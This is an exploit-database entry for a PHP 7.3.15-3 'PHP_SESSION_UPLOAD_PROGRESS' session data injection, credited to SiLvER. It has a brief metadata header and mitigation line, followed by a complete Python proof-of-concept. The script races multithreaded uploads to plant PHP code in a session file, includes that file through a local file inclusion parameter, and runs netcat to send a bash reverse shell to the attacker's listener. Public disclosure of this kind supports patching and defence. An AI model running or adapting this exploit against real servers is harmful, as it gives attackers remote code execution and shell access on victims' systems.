PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection

vendor:

PHP

by:

SiLvER | Faisal Alhadlaq

8,8

CVSS

HIGH

Session Data Injection

CWE

Product Name: PHP

Affected Version From: 7.3.15-3

Affected Version To: 7.3.15-3

Patch Exists: NO

Related CWE: N/A

CPE: a:php:php:7.3.15-3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP Version is 7.3.15-3

2021

PHP 7.3.15-3 – ‘PHP_SESSION_UPLOAD_PROGRESS’ Session Data Injection

This exploit abuses the PHP_SESSION_UPLOAD_PROGRESS parameter to trigger a race condition and gain remote code execution. The script will return a reverse shell using netcat.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a session.

Source

Exploit-DB raw data:

# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
# Date: 26/7/2021
# Exploit Author: SiLvER | Faisal Alhadlaq
# Tested on: PHP Version is 7.3.15-3
# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat

#!/usr/bin/python3
"""
Usage :

python3 poc.p <Target URL> <ListnerIP> <ListnerPORT>
python3 poc.py https://xyz.xyz 192.168.1.15 1337

"""
import requests
import threading
import datetime
import sys

x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
newDatetime = x + addSeconds

def fuzz():
	targetIP = sys.argv[1]
	listnerIP = sys.argv[2]
	listnerPORT = sys.argv[3]
	global newDatetime
	while True:
		try:
			if datetime.datetime.now() > newDatetime:
				exit()
			# proxies = {
			#     "http": "http://127.0.0.1:8080",
			#    	"https": "https://127.0.0.1:8080",
			#    	}
			sessionName = "SiLvER"
			url = targetIP
			s = requests.Session()
			cookies = {'PHPSESSID': sessionName}
			files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}
			# You need to change the parameter in your case , here the vulnerabile parameter is (lfi)
			params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)
			x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies
		
		except Exception as error:
			print(error)
			exit()
def main():
	print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")
	threads = []
	for _ in range(20):
		t = threading.Thread(target=fuzz)
		t.start()
		threads.append(t)
	for thread in threads:
		thread.join

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
        print("\n(=) By SiLvER \n")
        exit()  
    else:
    	main()